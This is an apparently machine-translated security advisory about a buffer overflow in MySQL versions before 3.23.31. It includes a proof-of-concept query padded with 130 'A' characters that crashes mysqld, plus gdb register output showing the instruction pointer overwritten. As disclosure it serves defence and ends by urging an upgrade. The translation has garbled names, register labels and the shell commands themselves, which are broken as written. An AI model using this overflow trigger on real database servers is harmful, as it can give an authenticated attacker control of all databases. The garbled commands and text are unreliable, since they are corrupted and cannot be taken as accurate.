Security vulnerabilities earlier than MySQL 3.23.31 _ MySQL

All MySQL versions earlier than MySQL 3.23.31 have a buffer overflow vulnerability, causing MySQL to crash. Attackers can obtain the permissions of mysqld and manipulate all databases. The premise of the attack is that a valid login name and password are required.

The following is the Mail abstract originally published in the MySQL mail list.

========================================================== ============

Is the vulnerability caused by Jo? O Gouveia found in January 12:

Steps:

Start mysql on the first terminal:

Spike:/var/mysql #/sbin/init. d/mysql start

On another terminal, enter:

Jrobert to @ spike :~ > Mysql-p-e 'Select a. ''' perl-E' printf ("A" x130) '''. B'

Enter password:

(No response? Exit by ^ C)

On the first terminal, the following information is displayed:

Spike:/var/mysql #/usr/bin/safe_mysqld: line 149: 15557 Segmentation fault

Nohup

$ Ledir/mysqld -- basedir = $ MY_BASEDIR_VERSION -- datadir = $ DATADIR -- skip-lockin

G "$ @" >>$ err_log 2 >&1>

Number of processes running now: 0

Mysqld restarted on Fri Jan 12 07:10:54 WET 2001

Mysqld daemon ended

The result is as follows:

(Gdb) run

Starting program:/usr/sbin/mysqld

[New Thread 16897 (manager thread)]

[New Thread 16891 (initial thread)]

[New Thread 16898]

/Usr/sbin/mysqld: ready for connections

[New Thread 16916]

[Switching to Thread 16916]

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(Gdb) info all-registers

Eax 0x1 1

ECS x 0x68 104

Edx 0x8166947 135686471

Ebx 0x41414141 1094795585

Esp 0xbf5ff408 0xbf5ff408

Ebp 0x41414141 0x41414141

Esi 0x41414141 1094795585

Edi 0x0 0

Eip 0x41414141 0x41414141

Eflags 0x10246 66118

Cs 0x23 35

Ss 0x2b 43

Ds 0x2b 43

Es 0x2b 43

Fs 0x0 0

Gs 0x0 0

The eip indicates that the buffer overflows.

The solution is to upgrade to 3.23.31. Therefore, if you have not upgraded your database to the latest version, please do it as soon as possible.